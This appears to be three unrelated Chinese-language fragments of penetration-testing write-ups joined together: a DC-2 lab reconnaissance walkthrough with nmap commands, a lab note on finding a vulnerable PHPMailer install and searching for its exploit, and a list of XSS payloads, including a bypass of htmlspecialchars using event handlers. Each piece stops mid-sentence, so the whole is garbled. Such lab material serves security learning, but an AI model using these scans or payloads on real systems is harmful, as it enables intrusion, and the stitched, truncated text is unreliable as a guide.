安装DC-2网卡开启NAT模式开始攻击攻击机kali (192.168.160.0/24)使用wpscan、cewl、hydra、dirb、nmap等工具信息搜集nmap -sP 192.168.160.0/24确定DC-2 IP 192.168.160.140扫描具体开放的端口nmap -sV 192.168.160.140 -p- -A得知SSH开放和http开放，访问http://192.1

信息搜集nmap扫描端口和ip发现80端口，用dirsearch扫描目录扫描到了vendor和wordpress目录以及contact.php页面随便看看，找到一个flag，并发现搭建了PHPMail之前爆出过phpmail的漏洞，我们用kali的searchexploit搜索一下再根据vender/version文件得知版本号为开头添加这个 防止乱码#!/usr/bin/python# -*-

1.普通的<ScRipt>alert(1)</ScRipt>1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法，先闭合输入，再使用事件来绕过' onclick ='javascript:alert(1)'//" onclick ='javascript:alert(1)'//3.<>